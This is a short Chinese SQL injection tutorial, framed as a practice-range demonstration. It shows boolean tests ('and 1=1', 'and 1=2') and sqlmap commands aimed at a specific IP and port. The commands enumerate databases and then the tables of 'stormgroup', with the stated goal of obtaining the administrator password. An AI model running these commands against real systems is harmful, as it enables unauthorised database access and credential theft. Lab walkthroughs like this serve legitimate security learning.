此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 !
1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。
地址栏输入 and 1=1
发现页面正常显示。
再次输入and 1=2
页面出现错误,说明该页面可能存在sql注入漏洞
2.现在拿出我们的kali工具,sqlmap进行注入测试。
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs
3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables